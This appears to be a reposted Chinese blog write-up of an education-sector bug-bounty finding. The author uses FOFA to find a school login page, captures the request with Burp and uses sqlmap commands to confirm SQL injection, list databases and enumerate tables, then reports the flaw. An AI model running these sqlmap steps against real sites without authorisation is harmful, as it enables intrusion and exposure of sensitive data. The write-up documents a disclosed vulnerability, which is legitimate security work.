本文主要是介绍记一次教育src挖洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
记一次教育src挖洞
- fofa搜索了一下,找到一个有sql注入的教育网站
- 漏洞url:http://x.x.x.x:8090/login
fofa搜索了一下,找到一个有sql注入的教育网站
#fofa搜索了一下,找到一个有sql注入的教育完整
漏洞url:http://x.x.x.x:8090/login
打开网站,随便输入数字,用burp抓包,在账号后面加*,保存到1.txt
sqlmap跑,存在sql注入
python sqlmap.py -r 1.txt --level 2
爆数据库
python sqlmap.py -r 1.txt --level 2 --dbs
数据太多了,只能挑几个表跑
python sqlmap.py -r 1.txt --level 2 --tables -D “examxx,mysql,yxzs-jxjsxy”
数据敏感,直接提交教育,第二天就可以拿到教育src邀请码
这篇关于记一次教育src挖洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
